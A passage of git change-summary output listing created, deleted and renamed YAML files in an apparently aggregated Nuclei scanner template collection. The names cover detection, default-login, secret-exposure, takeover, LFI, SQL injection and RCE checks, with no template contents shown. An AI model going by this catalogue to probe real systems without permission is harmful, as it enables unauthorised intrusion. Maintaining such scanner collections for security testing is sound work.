nuclei-templates/Other/{content-scheme-1204.yaml => content-scheme.yaml} (100%) delete mode 100644 nuclei-templates/Other/contentkeeper-detect-1203.yaml create mode 100644 nuclei-templates/Other/contentkeeper-detect.yaml delete mode 100644 nuclei-templates/Other/core-chuangtian-cloud-rce-1209.yaml create mode 100644 nuclei-templates/Other/core-chuangtian-cloud-rce-1211.yaml create mode 100644 nuclei-templates/Other/coremail-config-disclosure-1215.yaml delete mode 100644 nuclei-templates/Other/coremail-config-disclosure.yaml delete mode 100644 nuclei-templates/Other/cortex-xsoar-login-1225.yaml create mode 100644 nuclei-templates/Other/cortex-xsoar-login.yaml rename nuclei-templates/Other/{couchbase-buckets-api-1233.yaml => couchbase-buckets-api-1232.yaml} (100%) rename nuclei-templates/Other/{couchdb-adminparty-1237.yaml => couchdb-adminparty-1234.yaml} (100%) rename nuclei-templates/Other/{couchdb-exposure-1239.yaml => couchdb-exposure-1241.yaml} (100%) delete mode 100644 nuclei-templates/Other/couchdb-fauxton-1244.yaml create mode 100644 nuclei-templates/Other/couchdb-fauxton.yaml rename nuclei-templates/Other/{craftcms-admin-panel.yaml => craftcms-admin-panel-1245.yaml} (100%) create mode 100644 nuclei-templates/Other/credential-exposure-1250.yaml delete mode 100644 nuclei-templates/Other/credential-exposure-file.yaml delete mode 100644 nuclei-templates/Other/credentials-disclosure-1256.yaml delete mode 100644 nuclei-templates/Other/crlf-injection-1260.yaml create mode 100644 nuclei-templates/Other/crlf-injection-1263.yaml rename nuclei-templates/Other/{CRMEB-sqli.yaml => crmeb-sqli.yaml} (100%) rename nuclei-templates/Other/{crossdomain-xml-1269.yaml => crossdomain-xml-1267.yaml} (100%) create mode 100644 nuclei-templates/Other/crush-ftp-detect-1271.yaml delete mode 100644 nuclei-templates/Other/crush-ftp-detect-1272.yaml delete mode 100644 nuclei-templates/Other/cs-cart-unauthenticated-lfi-1282.yaml create mode 100644 nuclei-templates/Other/cs-cart-unauthenticated-lfi-1285.yaml delete mode 100644 nuclei-templates/Other/cs141-default-login-1277.yaml create mode 100644 nuclei-templates/Other/cs141-default-login-1279.yaml rename nuclei-templates/Other/{csod-panel-1286.yaml => csod-panel-1289.yaml} (100%) rename nuclei-templates/Other/{csrfguard-detect-1290.yaml => csrfguard-detect-1291.yaml} (100%) rename nuclei-templates/Other/{apache-solr-file-read.yaml => custom-solr-file-read.yaml} (100%) create mode 100644 nuclei-templates/Other/custom-swagger-ui-detect.yaml create mode 100644 nuclei-templates/Other/custom_nuclei-9.yaml delete mode 100644 nuclei-templates/Other/cx-cloud-login-6764.yaml create mode 100644 nuclei-templates/Other/cx-cloud-login.yaml rename nuclei-templates/Other/{dlink-file-read.yaml => d-link-arbitary-fileread-7042.yaml} (100%) create mode 100644 nuclei-templates/Other/d-link-wireless-7047.yaml delete mode 100644 nuclei-templates/Other/d-link-wireless-7048.yaml create mode 100644 nuclei-templates/Other/dahua-wpms-addimgico-fileupload.yaml rename nuclei-templates/Other/{darkstat-detect-6767.yaml => darkstat-detect.yaml} (100%) rename nuclei-templates/Other/{daybyday-detect.yaml => daybyday-detect-6772.yaml} (100%) rename nuclei-templates/Other/{db-schema.yaml => db-schema-6783.yaml} (100%) delete mode 100644 nuclei-templates/Other/dead-host-with-cname-6786.yaml create mode 100644 nuclei-templates/Other/dead-host-with-cname-6787.yaml rename nuclei-templates/Other/{dedecms-carbuyaction-fileinclude-6793.yaml => dedecms-carbuyaction-fileinclude.yaml} (100%) create mode 100644 nuclei-templates/Other/dedecms-membergroup-sqli-6798.yaml delete mode 100644 nuclei-templates/Other/dedecms-membergroup-sqli.yaml rename nuclei-templates/Other/{dedecms-openredirect.yaml => dedecms-openredirect-6803.yaml} (100%) create mode 100644 nuclei-templates/Other/default-apache2-page-6805.yaml delete mode 100644 nuclei-templates/Other/default-apache2-page.yaml rename nuclei-templates/Other/{default-apache2-ubuntu-page-6809.yaml => default-apache2-ubuntu-page-6810.yaml} (100%) delete mode 100644 nuclei-templates/Other/default-asp-net-page-6822.yaml create mode 100644 nuclei-templates/Other/default-asp-net-page-6825.yaml rename nuclei-templates/Other/{default-detect-generic-6838.yaml => default-detect-generic-6839.yaml} (100%) delete mode 100644 nuclei-templates/Other/default-django-page-6840.yaml create mode 100644 nuclei-templates/Other/default-django-page.yaml rename nuclei-templates/Other/{default-fastcgi-page.yaml => default-fastcgi-page-6846.yaml} (100%) rename nuclei-templates/Other/{default-fedora-page.yaml => default-fedora-page-6850.yaml} (100%) delete mode 100644 nuclei-templates/Other/default-glassfish-server-page-6854.yaml create mode 100644 nuclei-templates/Other/default-glassfish-server-page.yaml rename nuclei-templates/Other/{default-ibm-http-server.yaml => default-ibm-http-server-6857.yaml} (100%) delete mode 100644 nuclei-templates/Other/default-iis7-page.yaml delete mode 100644 nuclei-templates/Other/default-jetty-page-6862.yaml create mode 100644 nuclei-templates/Other/default-jetty-page-6863.yaml rename nuclei-templates/Other/{default-lighttpd-page-6867.yaml => default-lighttpd-page.yaml} (100%) rename nuclei-templates/Other/{default-lucee-page-6871.yaml => default-lucee-page-6870.yaml} (100%) create mode 100644 nuclei-templates/Other/default-microsoft-azure-page-6873.yaml delete mode 100644 nuclei-templates/Other/default-microsoft-azure-page.yaml rename nuclei-templates/Other/{default-openresty-6885.yaml => default-openresty-6884.yaml} (100%) create mode 100644 nuclei-templates/Other/default-oracle-application-page-6889.yaml delete mode 100644 nuclei-templates/Other/default-oracle-application-page-6892.yaml create mode 100644 nuclei-templates/Other/default-plesk-page-6898.yaml delete mode 100644 nuclei-templates/Other/default-plesk-page-6899.yaml rename nuclei-templates/Other/{default-redhat-test-page.yaml => default-redhat-test-page-6903.yaml} (100%) rename nuclei-templates/Other/{default-ssltls-test-page.yaml => default-ssltls-test-page-6907.yaml} (100%) rename nuclei-templates/Other/{default-tomcat-page.yaml => default-tomcat-page-6911.yaml} (100%) delete mode 100644 nuclei-templates/Other/default-windows-server-page-6912.yaml create mode 100644 nuclei-templates/Other/default-windows-server-page.yaml rename nuclei-templates/Other/{dell-idrac-default-login-6942.yaml => dell-idrac-default-login-6943.yaml} (100%) rename nuclei-templates/Other/{dell-idrac6-detect-6918.yaml => dell-idrac6-detect.yaml} (100%) rename nuclei-templates/Other/{dell-idrac7-detect-6923.yaml => dell-idrac7-detect-6924.yaml} (100%) create mode 100644 nuclei-templates/Other/dell-idrac8-detect-6926.yaml delete mode 100644 nuclei-templates/Other/dell-idrac8-detect-6927.yaml rename nuclei-templates/Other/{dell-idrac9-default-login-6933.yaml => dell-idrac9-default-login-6934.yaml} (100%) rename nuclei-templates/Other/{dell-idrac9-detect-6938.yaml => dell-idrac9-detect-6937.yaml} (100%) create mode 100644 nuclei-templates/Other/dell-openmanager-login-6949.yaml delete mode 100644 nuclei-templates/Other/dell-openmanager-login-6951.yaml delete mode 100644 nuclei-templates/Other/deprecated-sshv1-detection.yaml rename nuclei-templates/Other/{dericam-login.yaml => dericam-login-6960.yaml} (100%) create mode 100644 nuclei-templates/Other/detect-addpac-voip-gateway-6963.yaml delete mode 100644 nuclei-templates/Other/detect-addpac-voip-gateway-6965.yaml create mode 100644 nuclei-templates/Other/detect-dangling-cname-6966.yaml delete mode 100644 nuclei-templates/Other/detect-dangling-cname-6968.yaml rename nuclei-templates/Other/{detect-dns-over-https.yaml => detect-dns-over-https-6970.yaml} (100%) create mode 100644 nuclei-templates/Other/detect-drone-config-6972.yaml delete mode 100644 nuclei-templates/Other/detect-drone-config.yaml delete mode 100644 nuclei-templates/Other/detect-jabber-xmpp-6975.yaml create mode 100644 nuclei-templates/Other/detect-jabber-xmpp.yaml delete mode 100644 nuclei-templates/Other/detect-options-method-6977.yaml create mode 100644 nuclei-templates/Other/detect-options-method.yaml rename nuclei-templates/Other/{detect-sentry-6984.yaml => detect-sentry-6985.yaml} (100%) delete mode 100644 nuclei-templates/Other/detection-elasticsearch.yaml rename nuclei-templates/Other/{development-logs-6989.yaml => development-logs-6987.yaml} (100%) delete mode 100644 nuclei-templates/Other/diarise-theme-lfi.yaml create mode 100644 nuclei-templates/Other/dicoogle-pacs-lfi-6994.yaml delete mode 100644 nuclei-templates/Other/dicoogle-pacs-lfi.yaml create mode 100644 nuclei-templates/Other/digitalrebar-traversal-6996.yaml delete mode 100644 nuclei-templates/Other/digitalrebar-traversal.yaml delete mode 100644 nuclei-templates/Other/dir-850l-login-panel.yaml create mode 100644 nuclei-templates/Other/dir-listing-7005.yaml delete mode 100644 nuclei-templates/Other/dir-listing-7008.yaml rename nuclei-templates/Other/{directadmin-login-panel.yaml => directadmin-login-panel-7000.yaml} (100%) delete mode 100644 nuclei-templates/Other/discourse-xss-7013.yaml create mode 100644 nuclei-templates/Other/discourse-xss-7014.yaml rename nuclei-templates/Other/{Discuz-V72-SQLi.yaml => discuz-v72-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/dixell-xweb500-filewrite-7018.yaml delete mode 100644 nuclei-templates/Other/dixell-xweb500-filewrite.yaml delete mode 100644 nuclei-templates/Other/django-admin-panel-7023.yaml create mode 100644 nuclei-templates/Other/django-admin-panel.yaml create mode 100644 nuclei-templates/Other/django-debug-detect-7024.yaml create mode 100644 nuclei-templates/Other/django-debug-exposure-7029.yaml delete mode 100644 nuclei-templates/Other/django-debug-exposure.yaml delete mode 100644 nuclei-templates/Other/django-debug.yaml delete mode 100644 nuclei-templates/Other/django-framework-exceptions-7034.yaml create mode 100644 nuclei-templates/Other/django-framework-exceptions.yaml create mode 100644 nuclei-templates/Other/django-secret-key.yaml delete mode 100644 nuclei-templates/Other/django-secret.key.yaml rename nuclei-templates/Other/{servfail-refused-hosts-10169.yaml => dns-takeover.yaml} (100%) rename nuclei-templates/Other/{dns-waf-detect-7054.yaml => dns-waf-detect-7052.yaml} (100%) create mode 100644 nuclei-templates/Other/docker-compose-config-7059.yaml delete mode 100644 nuclei-templates/Other/docker-compose-config.yaml delete mode 100644 nuclei-templates/Other/docker-registry-7064.yaml create mode 100644 nuclei-templates/Other/docker-registry-7067.yaml rename nuclei-templates/Other/{dolibarr-detect.yaml => dolibarr-detect-7071.yaml} (100%) delete mode 100644 nuclei-templates/Other/dom-xss-7079.yaml create mode 100644 nuclei-templates/Other/dom-xss-7080.yaml rename nuclei-templates/Other/{dotclear-detect.yaml => dotclear-detect-7084.yaml} (100%) mode change 100644 => 100755 delete mode 100644 nuclei-templates/Other/dotcms-admin-panel-7085.yaml create mode 100644 nuclei-templates/Other/dotcms-admin-panel-7087.yaml create mode 100644 nuclei-templates/Other/dotnetcms-sqli-7089.yaml create mode 100644 nuclei-templates/Other/drone-ci-panel-7090.yaml delete mode 100644 nuclei-templates/Other/drone-ci-panel.yaml rename nuclei-templates/Other/{api-dropbox.yaml => dropbox.yaml} (100%) rename nuclei-templates/Other/{druid-monitor-7100.yaml => druid-monitor-7104.yaml} (100%) create mode 100644 nuclei-templates/Other/drupal.yaml create mode 100644 nuclei-templates/Other/ds-store-file.yaml delete mode 100644 nuclei-templates/Other/ds_store-7119.yaml delete mode 100644 nuclei-templates/Other/dubbo-admin-default-login-7120.yaml create mode 100644 nuclei-templates/Other/dubbo-admin-default-login.yaml delete mode 100644 nuclei-templates/Other/dvwa-default-login-7126.yaml create mode 100644 nuclei-templates/Other/dvwa-default-login-7129.yaml create mode 100644 nuclei-templates/Other/dvwa-headless-automatic-login-7130.yaml delete mode 100644 nuclei-templates/Other/dvwa-headless-automatic-login-7132.yaml create mode 100644 nuclei-templates/Other/dwr-921-login-panel.yaml rename nuclei-templates/Other/{dwr-index-detect.yaml => dwr-index-detect-7135.yaml} (100%) rename nuclei-templates/Other/{dynamic-registered-broadcast-receiver.yaml => dynamic-broadcast-receiver-7141.yaml} (100%) rename nuclei-templates/Other/{dynamicweb-panel.yaml => dynamicweb-panel-7144.yaml} (100%) rename nuclei-templates/Other/{dynatrace-token.yaml => dynatrace-token-7146.yaml} (100%) delete mode 100644 nuclei-templates/Other/easy-media-gallery-pro-listing.yaml create mode 100644 nuclei-templates/Other/easycvr-arbitrary-file-read.yaml create mode 100644 nuclei-templates/Other/eatery-restaurant-open-redirect.yaml delete mode 100644 nuclei-templates/Other/ecology-arbitrary-file-upload-7169.yaml create mode 100644 nuclei-templates/Other/ecology-arbitrary-file-upload.yaml rename nuclei-templates/Other/{ecology_E-Office_upload.yaml => ecology-oa-HrmCareerApplyPerView-sqli.yaml} (100%) rename nuclei-templates/Other/{ecology-springframework-directory-traversal-7175.yaml => ecology-springframework-directory-traversal-7174.yaml} (100%) rename nuclei-templates/Other/{ecology-syncuserinfo-sqli-7177.yaml => ecology-syncuserinfo-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/ecshop-sqli-7180.yaml delete mode 100644 nuclei-templates/Other/ecshop-sqli.yaml rename nuclei-templates/Other/{eg-manager-detect-7183.yaml => eg-manager-detect-7184.yaml} (100%) create mode 100644 nuclei-templates/Other/elFinder-path-traversal.yaml delete mode 100644 nuclei-templates/Other/elasticbeantalk-takeover-7188.yaml create mode 100644 nuclei-templates/Other/elasticbeantalk-takeover.yaml create mode 100644 nuclei-templates/Other/elasticsearch-7196.yaml rename nuclei-templates/Other/{elasticsearch-sql-client-detect.yaml => elasticsearch-sql-client-detect-7191.yaml} (100%) rename nuclei-templates/Other/{elfinder-detect-7202.yaml => elfinder-detect-7201.yaml} (100%) delete mode 100644 nuclei-templates/Other/elfinder-path-traversal(1).yaml rename nuclei-templates/Other/{elfinder-version.yaml => elfinder-version-7204.yaml} (100%) delete mode 100644 nuclei-templates/Other/email-extraction-7210.yaml create mode 100644 nuclei-templates/Other/email-extraction.yaml create mode 100644 nuclei-templates/Other/emcecom-default-login-7212.yaml delete mode 100644 nuclei-templates/Other/emcecom-default-login-7214.yaml rename nuclei-templates/Other/{EmpireCMS-list-sqli.yaml => empirecms-list-sqli.yaml} (100%) rename nuclei-templates/Other/{EmpireCMS-rate-sqli.yaml => empirecms-rate-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/empirecms-xss-7218.yaml create mode 100644 nuclei-templates/Other/empirecms-xss-7220.yaml create mode 100644 nuclei-templates/Other/ems-login-panel-7225.yaml delete mode 100644 nuclei-templates/Other/ems-login-panel.yaml delete mode 100644 nuclei-templates/Other/enable-secret-for-password-user-and-.yaml create mode 100644 nuclei-templates/Other/enable-secret-for-user-and-password.yaml create mode 100644 nuclei-templates/Other/entrust-identityguard.yaml rename nuclei-templates/Other/{env-exposed.yaml => env_exposed.yaml} (100%) create mode 100644 nuclei-templates/Other/envision-gateway-7226.yaml delete mode 100644 nuclei-templates/Other/envision-gateway.yaml create mode 100644 nuclei-templates/Other/epson-access-detect-7233.yaml delete mode 100644 nuclei-templates/Other/epson-access-detect.yaml create mode 100644 nuclei-templates/Other/epson-projector-detect-7238.yaml delete mode 100644 nuclei-templates/Other/epson-projector-detect.yaml delete mode 100644 nuclei-templates/Other/epson-web-control-detect-7239.yaml create mode 100644 nuclei-templates/Other/epson-web-control-detect-7241.yaml delete mode 100644 nuclei-templates/Other/erp-nc-directory-traversal-7245.yaml create mode 100644 nuclei-templates/Other/erp-nc-directory-traversal-7247.yaml rename nuclei-templates/Other/{etcd-keys.yaml => etcd-keys-7262.yaml} (100%) create mode 100644 nuclei-templates/Other/etouch-v2-sqli-7267.yaml delete mode 100644 nuclei-templates/Other/etouch-v2-sqli-7268.yaml delete mode 100644 nuclei-templates/Other/ewebs-arbitrary-file-reading-7271.yaml create mode 100644 nuclei-templates/Other/ewebs-arbitrary-file-reading.yaml rename nuclei-templates/Other/{exacqvision-default-login.yaml => exacqvision-default-login-7275.yaml} (100%) delete mode 100644 nuclei-templates/Other/exposed-adb-7280.yaml create mode 100644 nuclei-templates/Other/exposed-adb-7281.yaml rename nuclei-templates/Other/{exposed-alps-spring-7284.yaml => exposed-alps-spring.yaml} (100%) rename nuclei-templates/Other/{exposed-bitkeeper-7291.yaml => exposed-bitkeeper.yaml} (100%) rename nuclei-templates/Other/{exposed-darcs.yaml => exposed-darcs-7298.yaml} (100%) delete mode 100644 nuclei-templates/Other/exposed-gitignore-7303.yaml create mode 100644 nuclei-templates/Other/exposed-gitignore-7306.yaml rename nuclei-templates/Other/{exposed-glances-api-7307.yaml => exposed-glances-api-7308.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-kafdrop-7316.yaml delete mode 100644 nuclei-templates/Other/exposed-kafdrop.yaml rename nuclei-templates/Other/{exposed-mysql-initial-7324.yaml => exposed-mysql-initial-7323.yaml} (100%) delete mode 100644 nuclei-templates/Other/exposed-nomad-7329.yaml create mode 100644 nuclei-templates/Other/exposed-nomad-7330.yaml rename nuclei-templates/Other/{exposed-pagespeed-global-admin.yaml => exposed-pagespess-global-admin.yaml} (100%) rename nuclei-templates/Other/{exposed-service-now-7343.yaml => exposed-service-now-7340.yaml} (100%) delete mode 100644 nuclei-templates/Other/exposed-sharepoint-list-7345.yaml create mode 100644 nuclei-templates/Other/exposed-sharepoint-list-7348.yaml rename nuclei-templates/Other/{exposed-sqlite-manager-7350.yaml => exposed-sqlite-manager.yaml} (100%) create mode 100644 nuclei-templates/Other/exposed-svn-7351.yaml delete mode 100644 nuclei-templates/Other/exposed-svn-7352.yaml create mode 100644 nuclei-templates/Other/exposed-swagger.yaml delete mode 100644 nuclei-templates/Other/exposed-webalizer-7360.yaml create mode 100644 nuclei-templates/Other/exposed-webalizer.yaml delete mode 100644 nuclei-templates/Other/exposed-zookeeper-7362.yaml create mode 100644 nuclei-templates/Other/exposed-zookeeper-7365.yaml rename nuclei-templates/Other/{express-lfr.yaml => express-lfr-json.yaml} (100%) delete mode 100644 nuclei-templates/Other/exsi-system-7366.yaml create mode 100644 nuclei-templates/Other/exsi-system.yaml rename nuclei-templates/Other/{eyelock-nano-lfd.yaml => eyelock-nano-lfd-7375.yaml} (100%) delete mode 100644 nuclei-templates/Other/eyou-email-rce-7380.yaml create mode 100644 nuclei-templates/Other/eyou-email-rce-7383.yaml create mode 100644 nuclei-templates/Other/facebook-client-id-7385.yaml delete mode 100644 nuclei-templates/Other/facebook-client-id.yaml rename nuclei-templates/Other/{Fangweicms-SQLi.yaml => fangweicms-sqli.yaml} (100%) delete mode 100644 nuclei-templates/Other/fanruan-channel-deserialization.yaml create mode 100644 nuclei-templates/Other/fanruan-deserialization.yaml delete mode 100644 nuclei-templates/Other/fanruanoa-detect-7391.yaml create mode 100644 nuclei-templates/Other/fanruanoa-detect.yaml rename nuclei-templates/Other/{fanruanoa2012-disclosure-7389.yaml => fanruanoa2012-disclosure-7390.yaml} (100%) rename nuclei-templates/Other/{fastapi-docs-7399.yaml => fastapi-docs-7398.yaml} (100%) create mode 100644 nuclei-templates/Other/fastjson-1-2-47-rce-7415.yaml delete mode 100644 nuclei-templates/Other/fastjson-1-2-47-rce.yaml create mode 100644 nuclei-templates/Other/fastjson-1-2-62-rce-7419.yaml delete mode 100644 nuclei-templates/Other/fastjson-1-2-62-rce-7420.yaml rename nuclei-templates/Other/{fastjson-1-2-67-rce-7423.yaml => fastjson-1-2-67-rce-7424.yaml} (100%) rename nuclei-templates/Other/{fastjson-1-2-68-rce.yaml => fastjson-1-2-68-rce-7425.yaml} (100%) delete mode 100644 nuclei-templates/Other/fastjson-version-7428.yaml create mode 100644 nuclei-templates/Other/fastjson-version.yaml create mode 100644 nuclei-templates/Other/fastly-takeover-7430.yaml delete mode 100644 nuclei-templates/Other/fastly-takeover.yaml rename nuclei-templates/Other/{fatpipe-ipvpn-panel-7435.yaml => fatpipe-ipvpn-panel.yaml} (100%) delete mode 100644 nuclei-templates/Other/favicon-detection-7442.yaml create mode 100644 nuclei-templates/Other/favicon-detection.yaml rename nuclei-templates/Other/{fcm-server-key.yaml => fcm-server-key-7450.yaml} (100%) create mode 100644 nuclei-templates/Other/feedpress-takeover-7457.yaml delete mode 100644 nuclei-templates/Other/feedpress-takeover.yaml rename nuclei-templates/Other/{feifeicms-lfr.yaml => feifeicms-lfr-7463.yaml} (100%) delete mode 100644 nuclei-templates/Other/finereport-path-traversal-7478.yaml create mode 100644 nuclei-templates/Other/finereport-path-traversal.yaml rename nuclei-templates/Other/{fiorilaunchpad-logon-7484.yaml => fiorilaunchpad-logon.yaml} (100%) rename nuclei-templates/Other/{firebase-config-exposure-7488.yaml => firebase-config-exposure-7487.yaml} (100%) delete mode 100644 nuclei-templates/Other/firebase-database-7489.yaml create mode 100644 nuclei-templates/Other/firebase-database-7490.yaml delete mode 100644 nuclei-templates/Other/firebase-urls-7499.yaml create mode 100644 nuclei-templates/Other/firebase_urls.yaml rename nuclei-templates/Other/{fireware-xtm-user-authentication.yaml => fireware-xtm-user-authentication-7501.yaml} (100%) rename nuclei-templates/Other/{flightpath-panel.yaml => flightpath-panel-7508.yaml} (100%) rename nuclei-templates/Other/{flink-exposure.yaml => flink-exposure-7509.yaml} (100%) delete mode 100644 nuclei-templates/Other/flink.yaml rename nuclei-templates/Other/{flir-path-traversal-7523.yaml => flir-path-traversal.yaml} (100%) rename nuclei-templates/{wordpress => Other}/flow-flow-social-stream-xss.yaml (100%) rename nuclei-templates/Other/{flywheel_takeover.yaml => flywheel-takeover-7526.yaml} (100%) create mode 100644 nuclei-templates/Other/forcepoint-7529.yaml rename nuclei-templates/Other/{forcepoint-applicance-7527.yaml => forcepoint-applicance.yaml} (100%) delete mode 100644 nuclei-templates/Other/forcepoint.yaml create mode 100644 nuclei-templates/Other/fortianalyzer-certificate.yaml create mode 100644 nuclei-templates/Other/fortiauthenticator.yaml create mode 100644 nuclei-templates/Other/fortiddos.yaml create mode 100644 nuclei-templates/Other/fortigate-certificate.yaml rename nuclei-templates/Other/{fortimail-panel-7531.yaml => fortimail-panel-7532.yaml} (100%) create mode 100644 nuclei-templates/Other/fortimanager-certificate.yaml create mode 100644 nuclei-templates/Other/fortiwifi-certificate.yaml delete mode 100644 nuclei-templates/Other/foulenzer-subdomain-tk (copy 1).yaml delete mode 100644 nuclei-templates/Other/freelancer.yaml delete mode 100644 nuclei-templates/Other/freshdesk-takeover-7540.yaml create mode 100644 nuclei-templates/Other/freshdesk-takeover-7541.yaml create mode 100644 nuclei-templates/Other/front-page-misconfig-7547.yaml delete mode 100644 nuclei-templates/Other/front-page-misconfig-7549.yaml rename nuclei-templates/Other/{frontify-takeover.yaml => frontify-takeover-7543.yaml} (100%) rename nuclei-templates/Other/{frp-default-login-7559.yaml => frp-default-login.yaml} (100%) rename nuclei-templates/Other/{frServer-listDir.yaml => frserver-listdir.yaml} (100%) rename nuclei-templates/Other/{ftp-credentials-exposure.yaml => ftp-credentials-exposure-7568.yaml} (100%) delete mode 100644 nuclei-templates/Other/ftp-default-credentials.yaml create mode 100644 nuclei-templates/Other/ftp-default-creds.yaml rename nuclei-templates/Other/{ftpconfig-7565.yaml => ftpconfig.yaml} (100%) create mode 100644 nuclei-templates/Other/fuelcms-default-login-7571.yaml delete mode 100644 nuclei-templates/Other/fuelcms-default-login.yaml delete mode 100644 nuclei-templates/Other/fuzz-reflection-xss.yaml delete mode 100644 nuclei-templates/Other/ganglia-xml-grid-monitor-7573.yaml create mode 100644 nuclei-templates/Other/ganglia-xml-grid-monitor-7574.yaml delete mode 100644 nuclei-templates/Other/gcp-service-account-7575.yaml rename nuclei-templates/Other/{generic-linux-lfi-7589.yaml => generic-linux-lfi.yaml} (100%) delete mode 100644 nuclei-templates/Other/generic-windows-lfi-7590.yaml create mode 100644 nuclei-templates/Other/generic-windows-lfi.yaml rename nuclei-templates/Other/{geoserver-default-login-7594.yaml => geoserver-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/geovision-geowebserver-lfi-7595.yaml delete mode 100644 nuclei-templates/Other/geovision-geowebserver-lfi-xss.yaml delete mode 100644 nuclei-templates/Other/geovision-geowebserver-lfi.yaml create mode 100644 nuclei-templates/Other/geovision-geowebserver-xss-7600.yaml delete mode 100644 nuclei-templates/Other/geovision-geowebserver-xss-7601.yaml create mode 100644 nuclei-templates/Other/geowebserver-lfi-xss.yaml rename nuclei-templates/Other/{gespage-detect.yaml => gespage-detect-7603.yaml} (100%) delete mode 100644 nuclei-templates/Other/get.yaml rename nuclei-templates/Other/{getresponse-takeover-7609.yaml => getresponse-takeover-7607.yaml} (100%) create mode 100644 nuclei-templates/Other/getsimple-cms-detect-7615.yaml delete mode 100644 nuclei-templates/Other/getsimple-cms-detect.yaml rename nuclei-templates/Other/{getsimple-cms-detector.yaml => getsimple-cms-detector-7612.yaml} (100%) rename nuclei-templates/Other/{getsimple-installation.yaml => getsimple-installation-7618.yaml} (100%) delete mode 100644 nuclei-templates/Other/ghe-encrypt-saml.yaml create mode 100644 nuclei-templates/Other/ghe-saml.yaml create mode 100644 nuclei-templates/Other/ghost-takeover-7620.yaml delete mode 100644 nuclei-templates/Other/ghost-takeover.yaml create mode 100644 nuclei-templates/Other/git-config-nginxoffbyslash-7629.yaml delete mode 100644 nuclei-templates/Other/git-config-nginxoffbyslash.yaml rename nuclei-templates/Other/{git-credentials-disclosure.yaml => git-credentials-disclosure-7641.yaml} (100%) create mode 100644 nuclei-templates/Other/github-enterprise-detect-7650.yaml delete mode 100644 nuclei-templates/Other/github-enterprise-detect.yaml rename nuclei-templates/Other/{github-gemfile-files-7653.yaml => github-gemfile-files.yaml} (100%) create mode 100644 nuclei-templates/Other/github-page-config-7654.yaml delete mode 100644 nuclei-templates/Other/github-page-config.yaml delete mode 100644 nuclei-templates/Other/github-takeover-7659.yaml create mode 100644 nuclei-templates/Other/github-takeover-7662.yaml create mode 100644 nuclei-templates/Other/github-workflows-disclosure-7665.yaml delete mode 100644 nuclei-templates/Other/github-workflows-disclosure-7666.yaml rename nuclei-templates/Other/{gitlab-detect.yaml => gitlab-detect-7672.yaml} (100%) rename nuclei-templates/Other/{gitlab-public-repos-7678.yaml => gitlab-public-repos.yaml} (100%) rename nuclei-templates/Other/{gitlab-public-snippets-7690.yaml => gitlab-public-snippets.yaml} (100%) delete mode 100644 nuclei-templates/Other/gitlab-rce-7691.yaml create mode 100644 nuclei-templates/Other/gitlab-rce-7693.yaml delete mode 100644 nuclei-templates/Other/gitlab-user-enum-7699.yaml create mode 100644 nuclei-templates/Other/gitlab-user-enum-7700.yaml rename nuclei-templates/Other/{gitlab-weak-login.yaml => gitlab-weak-login-7707.yaml} (100%) rename nuclei-templates/Other/{gitlab-workflow-7708.yaml => gitlab-workflow.yaml} (100%) rename nuclei-templates/Other/{gitlist-disclosure-7709.yaml => gitlist-disclosure.yaml} (100%) create mode 100644 nuclei-templates/Other/global-domains-lfi-7714.yaml delete mode 100644 nuclei-templates/Other/global-domains-lfi.yaml rename nuclei-templates/Other/{global-domains-xss-7717.yaml => global-domains-xss-7718.yaml} (100%) create mode 100644 nuclei-templates/Other/globalprotect-panel-7719.yaml delete mode 100644 nuclei-templates/Other/globalprotect-panel-7721.yaml rename nuclei-templates/Other/{gloo-unauth-7722.yaml => gloo-unauth-7726.yaml} (100%) delete mode 100644 nuclei-templates/Other/glpi-9.3.3-sql-injection(1).yaml delete mode 100644 nuclei-templates/Other/glpi-authentication-7729.yaml create mode 100644 nuclei-templates/Other/glpi-authentication.yaml create mode 100644 nuclei-templates/Other/glpi-default-login-7732.yaml delete mode 100644 nuclei-templates/Other/glpi-default-login-7733.yaml rename nuclei-templates/Other/{glpi-directory-listing.yaml => glpi-directory-listing-7734.yaml} (100%) delete mode 100644 nuclei-templates/Other/glpidirectorylisting(1).yaml create mode 100644 nuclei-templates/Other/glpidirectorylisting.yaml create mode 100644 nuclei-templates/Other/go-anywhere-client-7743.yaml delete mode 100644 nuclei-templates/Other/go-anywhere-client.yaml delete mode 100644 nuclei-templates/Other/gocd-login-7751.yaml create mode 100644 nuclei-templates/Other/gocd-login-7753.yaml rename nuclei-templates/Other/{gogs-install-exposure.yaml => gogs-install-exposure-7757.yaml} (100%) rename nuclei-templates/Other/{gogs-workflow-7760.yaml => gogs-workflow.yaml} (100%) rename nuclei-templates/Other/{goip-1-lfi-7761.yaml => goip-1-lfi-7764.yaml} (100%) delete mode 100644 nuclei-templates/Other/google-api-key-7766.yaml create mode 100644 nuclei-templates/Other/google-api-key-7769.yaml rename nuclei-templates/Other/{google-earth-dlogin-7778.yaml => google-earth-dlogin-7780.yaml} (100%) create mode 100644 nuclei-templates/Other/google-floc-disabled-7783.yaml delete mode 100644 nuclei-templates/Other/google-floc-disabled-7786.yaml rename nuclei-templates/Other/{facebook-secrets.yaml => google-secrets.yaml} (100%) create mode 100644 nuclei-templates/Other/google-storage-7790.yaml delete mode 100644 nuclei-templates/Other/google-storage.yaml rename nuclei-templates/Other/{googlet-extsearchplaces.yaml => google-textsearchplaces.yaml} (100%) delete mode 100644 nuclei-templates/Other/gophish-default-login-7792.yaml create mode 100644 nuclei-templates/Other/gophish-default-login.yaml delete mode 100644 nuclei-templates/Other/gophish-login-7796.yaml create mode 100644 nuclei-templates/Other/gophish-login.yaml delete mode 100644 nuclei-templates/Other/gradio-CVE-2024-1561.yaml delete mode 100644 nuclei-templates/Other/gradio-CVE-2024-1728.yaml delete mode 100644 nuclei-templates/Other/gradle-enterprise-panel-7800.yaml create mode 100644 nuclei-templates/Other/gradle-enterprise-panel.yaml rename nuclei-templates/Other/{grafana-default-login-7801.yaml => grafana-default-login-7803.yaml} (100%) delete mode 100644 nuclei-templates/Other/grafana-detect-7808.yaml create mode 100644 nuclei-templates/Other/grafana-detect-7809.yaml delete mode 100644 nuclei-templates/Other/grafana-file-read-7812.yaml create mode 100644 nuclei-templates/Other/grafana-file-read-7813.yaml rename nuclei-templates/Other/{grafana-public-signup-7814.yaml => grafana-public-signup.yaml} (100%) rename nuclei-templates/Other/{graphql-array-batching-7827.yaml => graphql-array-batching.yaml} (100%) create mode 100644 